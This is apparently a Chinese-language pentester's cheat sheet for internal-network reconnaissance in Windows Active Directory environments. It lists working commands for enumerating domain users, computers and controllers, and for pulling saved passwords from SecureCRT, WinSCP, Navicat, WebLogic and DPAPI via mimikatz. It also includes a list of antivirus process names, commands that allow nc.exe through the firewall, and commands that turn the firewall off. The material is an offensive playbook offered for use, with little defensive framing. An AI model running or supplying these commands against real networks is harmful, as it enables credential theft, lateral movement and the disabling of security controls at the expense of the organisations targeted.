关于内网小众信息收集

1.密码策略收集

    1.net accounts /domain    如果是域用户，用命令查看     （域内）

    2.运用kali的ldapsearch来收集         （域外）

        dapsearch -x -H ldap://192.168.1.1:389 -D "CN=testa,CN=Users,DC=test,DC=com" -w DomainUser123! -b "DC=test,DC=com" | grep replUpToDateVector -A 13

        ps:   testa为用户名，-w为密码

    3.利用ipc连接查看，前提的晓得一个域用户的账号密码。     （域外）

        type "\\192.168.160.139\C$\Windows\SYSVOL\sysvol\leecinsy.com\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf"

        有2个常用位置，上面那个是我自己win8的

        \\192.168.1.1\SYSVOL\test.com\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf    //这2个常用位置

    4.运用Microsoft.ActiveDirectory.Management.dll（域内域外都可以，我没有成功）

    

2.活动目录信息的获取

    1.利用kali的ldapsearch来收集(域外)

        ldapsearch -x -H ldap://192.168.1.1:389 -D "CN=testa,CN=Users,DC=test,DC=com" -w DomainUser123! -b "DC=test,DC=com"    //显示所有能查询的信息

        ldapsearch -x -H ldap://192.168.1.1:389 -D "CN=testa,CN=Users,DC=test,DC=com" -w DomainUser123! -b "DC=test,DC=com" -b "DC=test,DC=com" "(&(objectClass=user)(objectCategory=person))" CN | grep cn

        //查询所有的域用户，并且只显示cn的信息，用户名，如果想全部显示，去掉管道符后面的

        ldapsearch -x -H ldap://192.168.1.1:389 -D "CN=testa,CN=Users,DC=test,DC=com" -w DomainUser123! -b "DC=test,DC=com" -b "DC=test,DC=com" "(&(objectCategory=computer)(objectClass=computer))" CN | grep cn        //查询所有的计算机名，并且只显示cn的信息，计算机名，如果想全部显示，去掉管道符后面的。

        ldapsearch -x -H ldap://192.168.1.1:389 -D "CN=testa,CN=Users,DC=test,DC=com" -w DomainUser123! -b "DC=test,DC=com" -b "DC=test,DC=com" "(&(objectCategory=group))" CN | grep cn

        //查询所有的组

    2.利用powershellspilot(域外&域内)

        $uname="cpwgp"                                                      

        $pwd=ConvertTo-SecureString "123456ab.." -AsPlainText –Force                   

        $cred=New-Object System.Management.Automation.PSCredential($uname,$pwd)

        //前面3行未固定格式，最后一行为执行命令

        Get-NetUser -Domain leecinsy.com -DomainController 192.168.160.139 -ADSpath "LDAP://DC=leecinsy,DC=com" -Credential $cred      //获取凭证

        Get-NetUser -Domain leecinsy.com -DomainController 192.168.160.139 -ADSpath "LDAP://DC=leecinsy,DC=com" -Credential $cred | fl name    //只返回用户名

        Get-NetComputer -Domain leecinsy.com -DomainController 192.168.160.139 -ADSpath "LDAP://DC=leecinsy,DC=com" -Credential $cred | fl name   //只返回机器名

        Get-NetGroup -Domain leecinsy.com -DomainController 192.168.160.139 -ADSpath "LDAP://DC=leecinsy,DC=com" -Credential $cred | fl name     //返回所有组

 

3.RDP连接历史记录

    1.HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers    //只能看当前登录的

     如果想看全部，选中HKEY_USERS项，单击加载配置单元，找到NTUSER.DAT文件，然后我说说他的位置

        C:\Documents and Settings\用户名\NTUSER.DAT

        C:\Windows\profiles\用户名目录下

        C:\Users\ASUS                 \\即可加载全部，然后完事后记得删除

    或者使用命令行

        Reg load HKEY_USERS\S-1-5-21-1170783345-3748964848-1387080272-1003 C:\Documents and Settings\c\NTUSER.DAT

        Reg unload HKEY_USERS\S-1-5-21-1170783345-3748964848-1387080272-1003

 

    2.利用powershell

        (获得当前用户的rdp记录)

        dir "Registry::HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" -Name     //罗列ip

        (Get-ItemProperty -Path "Registry::HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers\192.168.160.145").UsernameHint      //查询用户名

        （获得已登录用户历史记录）

        Get-WmiObject -Class Win32_UserAccount     

        wmic /NAMESPACE:"\\root\CIMV2" PATH Win32_UserAccount GET /all  /FORMAT:list     //枚举账户的sid

        然后是一套脚本，放在笔记里（脚本2）

        

3. 利用cmd嘛，cmdkey /l

            或者用   dir /a %userprofile%\AppData\Local\Microsoft\Credentials\*    查看

 

        4.利用mimikatz

            mimikatz:

            dpapi::cred/in:C:\Users\Administrator\AppData\Local\Microsoft\Credentials\92FB159ED290FC523E845094404697A8

 

4.域控IP与与域机器的查找

    1.ipconfig /all      查看dns服务器，即为域控的ip

    2.开了389的端口的可能为域控

    3.利用信任域查找

        nltest /domain_trusts /all_trusts /v /server:192.168.160.145

        nltest /dsgetdc:pohpl /server:192.168.1.36

    4.net group "domain controllers" /domain     //命令查找

    5.nltest /dclist:leecinsy    //普通机器也可以查看

    6.利用nbtscan扫描

    7.利用csvde(一般说只有ad有，但是说不定不是ad也可以)

        csvde ‐setspn hack ‐f c:\windows\temp\hack.csv    CN=Common Name 为用户名或服务器名

    8.利用setspn

        setspn -T leecinsy -Q */*

        setspn -T leecinsy -Q */* | findstr iis

    9.利用dsquery.exe

        dsquery.exe server   //查域控

    10.利用dnsdump

        dnsdump.exe ‐u leecinsy\cpwgp ‐p 123456ab.. WIN-58124A27PCR -r

        

 

5.存活主机，资产探寻

    1.用nbtscan扫

    2.For /l %i in (1,1,255) do @ping 12.168.100.%i -w 1 -n 1 | find “TTL=”

    3.httpscan扫苗

    4.一些密码查看，SecureCRT,Winscp

    破解:（SecureCRT）

        powershell-import ./ListInstalledPrograms.ps1

       powershell Get-list

        dir %APPDATA%\VanDyke\Config\Sessions\       //查找SecureCRT的配置文件

        powershell-import ./Invoke-Ninjacopy.ps1

        powershell Invoke-NinjaCopy -Path "靶机ini文件" -LocalDestination "C:\users\desktop\ini文件

        然后解密：python2 securecrt-decrypt.py 192..168.1.1.ini（7以下）

        如果高版本，直接把 dir %APPDATA%\VanDyke\Config\整个目录拷过来，版本要一直哦，然后直接连接

    破解：（Winscp）ps:目标的事先保存密码

        powershell-import ./ListInstalledPrograms.ps1

       powershell Get-list

       reg query HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions（默认存在的注册表）  会返回一些信息 例如root@192.168.1.1

       reg query HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions\root@192.168.1.1

       然后将password用winscppwd.exe解密 winscppwd.exe root 192.168.1.1 hash即可

       也可以进入winscp,导出winscp的ini文件，然后用winscp解密   winscppwd.exe Winscp.ini

    破解:weblogic的数据库密码

        先找到4个比较重要的文件

        /weblogic/user_projects/domains/base_domain/security/SerializedSystemIni.dat         SerializedSystemIni.dat

        /weblogic/user_projects/domain/base_doman/servers/Admin/security/boot.properties           boot.properties

        /weblogic/user_projects/domains/base_domain/config/jdbc/xx-jdbc.xml                xx-jdbc.xml

        /weblogic/user_projects/domains/base_domain/config/config.xml                  config.xml

        然后用jar脚本跑，第一行用 SerializedSystemIni.dat      第二行用config.xml文件中提取   或者用xx-jdbc.xml获取

    破解navicat

        MySQL        HKEY_CURRENT_USER\Software\PremiumSoft\Navicat\Servers\

                reg query HKEY_CURRENT_USER\SOFTWARE\PremiumSoft\Navicat\Servers /s /v host

                reg query HKEY_CURRENT_USER\SOFTWARE\PremiumSoft\Navicat\Servers /s /v pwd

                reg query HKEY_CURRENT_USER\SOFTWARE\PremiumSoft\Navicat\Servers /s /v UserName

        MariaDB        HKEY_CURRENT_USER\Software\PremiumSoft\NavicatMARIADB\Servers\

        Microsoft SQL        HKEY_CURRENT_USER\Software\PremiumSoft\NavicatMSSQL\Servers\

        Oracle        HKEY_CURRENT_USER\Software\PremiumSoft\NavicatOra\Servers\

        PostgreSQL        HKEY_CURRENT_USER\Software\PremiumSoft\NavicatPG\Servers\

        SQLite        HKEY_CURRENT_USER\Software\PremiumSoft\NavicatSQLite\Servers\

        找到以后，可以导出本地，用本地的注册表替换

 

6.域机器域成员查找

1.定位域日志

域日志位置

C:\Windows\System32\winevt\Logs\Security.evtx 服务器登录日志 登录事件ID 4624，可判别出登录域控制器的机器

c:\windows\system32\winevt\logs\*.remote* 远程登录日志

主机远程登录日志

HKCU\Software\Microsoft\Terminal Server Client\Servers

HKCU\Software\Microsoft\Terminal Server Client\Default

 

 

7.关于本机的信息

1.查看是否为虚拟机

Systeminfo | findstr /i "System Model

dmidecode -s system-product-name       如若存在vitrul，就是虚拟机

wmic product get name,version          //查看安装了哪些软件，版本信息

path     //查看环境变量

 

2.看补丁，看杀软，看共享

看杀软

1.systeminfo

        systeminfo>micropoor.txt&(for %i in (  KB977165 KB2160329 KB2503665 KB2592799  KB2707511 KB2829361 KB2850851 KB3000061   KB3045171 KB3077657 KB3079904  KB3134228 KB3143141  KB3141780 ) do @type micropoor.txt|@find /i  "%i"|| @echo  %i you can fuck)&del /f /q /a micropoor.txt具体查找哪些补丁打没有打

        wmic qfe也是看补丁

        wmci os看操作系统

        systeminfo | findstr /B /C:"OS 名称" /C:"OS 版本"          看操作系统和版本

        wmic OS get Caption,CSDVersion,OSArchitecture,Version看的更具体

2.WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List   查看杀软，接下来我说一说常见的杀软进程

    wmic /namespace:\\root\securitycenter2 path antivirusproduct GET displayName,productState, pathToSignedProductExe

瑞星：

    CCENTER.EXE  Ravmond.exe  RavStub.exe   RAVTIMER.EXE  rfwmain.exe  rfwsrv.exe

McAfee:    

    avconsol.exe  avsynmgr.exe   alogserv.exe    vshwin32.exe   vsstat.exe   webscanx.exe   

金山毒霸：

    KAVPlus.EXE   KWatchUI.EXE  KPopMon.EXE  KULANSyn.EXE   KAVSvc.EXE   KAVStart.exe  KavPFW.exe   KSafeTray.exe

Norton:

    Norton AntiVirus   Navapsvc.exe   rtvscan.exe   vptray.exe   NPFMntor.exe   ccSetMgr.exe    SPBBCSvc.exe

360：

    360arp.exe   360safebox.exe   360Safe.exe   360tray.exe   360sd.exe  zhudongfangyu.exe

其他的：

    avguard.exe//小红伞     egui.exe//nod32      AVP.EXE//卡巴斯基    bdagent.exe//bitdefender  

    safedogupdatecenter//安全狗      Iparmor.exe//木马克星     vsmon.exe//ZoneAlarm个人防火墙

3.netsh firewall show state  查看防火墙的状态       netsh interface portproxy show all查看防火墙端口代理

    netsh firewall show config   查看防火墙的配置

    netsh advfirewall firewall add rule name="a" dir=in action=allow program="c:\nc.exe"   //允许指定指定程序进入

    netsh advfirewall firewall add rule name="b" dir=out action=allow program="c:\nc.exe"    //允许指定指定程序退出

    netsh advfirewall set currentprofile logging filename "c:\windows\temp\a.log"   //自定义防火墙日志的储存位置

    当然关闭防火墙也有很多命令

        netsh firewall set opmode mode=disable

        netsh firewall set Remote admin mode=enable

        netsh firewall set opmode disable

        netsh advfirewall set allprofiles state off

        wmic share get name,path,status     查看共享列表